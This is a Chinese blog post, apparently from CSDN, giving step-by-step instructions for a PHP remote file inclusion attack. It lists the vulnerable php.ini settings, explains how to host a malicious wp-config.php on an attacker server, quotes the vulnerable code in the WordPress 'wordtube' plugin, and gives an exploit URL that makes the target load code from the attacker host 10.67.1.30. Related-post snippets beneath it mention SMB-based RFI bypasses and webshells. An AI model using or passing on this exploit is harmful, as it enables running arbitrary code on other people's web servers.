远程修改 php,修改部分php配置实现 远程包含 攻击

于 2021-03-27 23:39:48 发布
阅读量110 收藏
点赞数
文章标签: 远程修改 php

1. 调试期间,可以打开display_errors = On

2. 目标机使用了include、require或require_once

3. 目标机配置

a) register_globals = On

b) allow_url_fopen = On

c) allow_url_include = On

这样的目标就可以进行攻击了

自己搭建简易的服务器,apache + php 即可

修改httpd.conf中,将后缀为php的,从而避免代码在攻击端就被执行,

#AddType application/x-httpd-php .php .html .htm

根据漏洞代码,生成对应的环境,例如:

if (!$_POST) $wppath=$_GET['wpPATH'];

else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');

我们就可以建立一个可访问的文件夹bad_guy,

增加读权限order allow,deny allow from all ,

然后在里面新建一个wp-config.php

~然后请求一下就行了

/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy

来张效果图:

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

Y.X2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP获取远程文件的几种方式
EwanRenton
07-26 2926
layout: post title: "PHP获取远程文件的几种方式" date: 2016-05-18 14:18:15 +0800 comments: true categories: [php] 接上次的内容,今天结合代码来分析下PHP获取远程文件的几种方式。 fopen 获取本地文件 获取到的资源绑定到一个流上面 file_get_centents 获取一些Get获...
php远程调试 网页界面,php+xdebug远程调试(单人)
weixin_42363231的博客
03-23 129
目录服务器上安装 XDebug 及配置客户端 PHPstorm 配置浏览器安装插件服务器上安装 XDebug 及配置XDebug 安装略配置:打开 php.ini 配置文件:vim /etc/php.ini在最后加上以下内容:[Xdebug]zend_extension="/usr/lib64/php/modules/xdebug.so"xdebug.remote_enable=1xdebug.r...
php调用远程网页转换,PHP远程获取网页内容类和调用方法
weixin_42415498的博客
03-11 120
下面的方法方便以后再远程获取网页内容时候使用。requestRemote.php< ?php/** get Info Mode :* 1: body;* 0: header;* 2: validate server* myRequestRemote::requestRemote($url, $mode)**/class myRequest...
PHP请求防止参数被篡改和设置请求超时
Selly166的博客
03-14 1249
代码用途,实现URL参数防止篡改、设置请求超时: 仅演示了GET请求,POST原理是一样的 防参数篡改原理,客户端请求带上sign参数,服务端去校验sign参数,sign生成规则:url参数增加一个盐值(保密的参数,只有客户端和服务端知晓),排序后MD5,服务端去进行验证,具体看看代码就理解了; 请求超时(前提防止参数篡改):客户端请求带上time参数,服务端去校验; 客户端请求的代码; //...
微信文章如何采集php,如何用 php 抓取微信文章正文?
weixin_35859737的博客
03-10 444
我是一个新手,想使用php抓取微信页面的正文和标题,标题直接用正则表达式|(.*?)|i就抓取到了,但是正文我想的是|>(.*?)这是一般的微信文章内容链接下面是这链接的页面代码var sampling = Math.random() < 0.001;var page_begintime = (+new Date());(sampling) && ((new Image()).src = "...
ini文件乱码_PHP中获取远程文件的三种方法
weixin_39875028的博客
11-26 60
1. file_get_contents<?php $url = 'http://www.xxx.com/'; $contents = file_get_contents($url); //如果出现中文乱码使用下面代码 //$getcontent = iconv(“gb2312″, “utf-8″,file_get_contents($url)); //echo $ge...
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
php将远程图片保存到本地服务器的实现代码
10-23
总结来说,通过PHP的cURL库和自定义函数,我们可以轻松地实现远程图片到本地服务器的保存。这不仅适用于单个图片,也可以应用于批量处理,只需在一个循环中调用这些函数即可。同时,确保正确处理任何可能出现的错误...
PHP 远程关机实现代码
10-29
同时,IIS或Apache服务器需要配置为允许执行`cmd.exe`,这也增加了服务器被攻击的可能性。 总之,PHP远程关机代码是一种强大的工具,但也是一种潜在的安全威胁。开发者应该理解其工作原理,并在部署此类功能时采取...
使用SMB共享来绕过php远程文件包含的限制执行RFI的利用
10-16
总结起来,通过利用SMB共享,攻击者可以在PHP环境禁止远程HTTP/FTP文件包含的情况下,依然实现RFI攻击。这凸显了安全配置的重要性,即使看似安全的设置也可能存在潜在的漏洞。开发人员和系统管理员应确保对所有文件...
PHP实现从远程下载文件的方法
06-04
总的来说,PHP实现远程文件下载的方法包括使用`file_get_contents()`, `cURL`,或者如实例中的`copy()`函数。在实际开发中,应该根据项目需求和性能考虑选择适当的方法,并添加必要的错误处理和安全性措施。
Php修改config配置文件,修改config配置文件
weixin_33293858的博客
03-25 817
/*** 修改config的函数* @param $arr1 配置前缀* @param $arr2 数据变量* @return bool 返回状态*/public function setconfig($pat, $rep){/*** 原理就是 打开config配置文件 然后使用正则查找替换 然后在保存文件.* 传递的参数为2个数组 前面的为配置 后面的为数值. 正则的匹配为单引号 如果你的是...
php 怎么远程包含,利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制...
weixin_33125137的博客
03-18 611
前言文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP或FTP url包含远程文件。但是使用SMB依旧可以加载。攻击思路攻击者需要配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP Webshell。配置php.ini文件禁用 "allow_url_...
php入侵代码,入侵PHP网站就这么简单.pdf
weixin_42318815的博客
03-10 1840
入侵PHP网站就这么简单.pdf适合读者:脚本爱好者、入侵爱好者一 日上网偶然看到了一个网站的UR L,引发 /我的IP/2.php,发现phpspy作为网页的一部分显了我的无限联想,其URL形~Z1]http://xxX。org.tw/ 示出来了,如图2所示。index。php?rurl=page01.php,看等号后面的那部分,明明就是个PHP文件嘛,由此我猜想inde...
营销策划 -2024非遗大展预热引流策划方案.pptx
07-13
营销策划 -2024非遗大展预热引流策划方案.pptx
全网最热Python3入门+进阶 更快上手实际开发
07-13
网最热Python3入门+进阶 更快上手实际开发 第1章 Python入门导学.mp4 239.6MB 第9章 高级部分:面向对象 第8章 Python函数 第7章 包、模块、函数与变量作用域 第6章 分支、循环、条件与枚举 第5章 变量与运算符 第4章 Python中表示“组”的概念与定义 第3章 理解什么是写代码与Python的基本类型 第2章 Python环境安装 第1章 Python入门导学 第14章 Pythonic与Python杂记 第13章 实战:原生爬虫 第12章 函数式编程: 匿名函数、高阶函数、装饰器
物资合同管理台账.docx
07-13
物资合同管理台账.docx
项目管理策划编写模板.docx
07-13
项目管理策划编写模板.docx
营销策划 -现代牧业发布会全案策划.pptx
最新发布
07-13
营销策划 -现代牧业发布会全案策划.pptx
基于php在线考试系统设计与实现.docx
11-13
在系统详细设计与实现部分,作者详细阐述了每个功能模块的具体实现,包括SSL协议的配置,各模块的功能设计和交互逻辑。系统测试环节验证了系统的功能完备性和稳定性,确保其在实际应用中的可靠性。 这个基于PHP的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值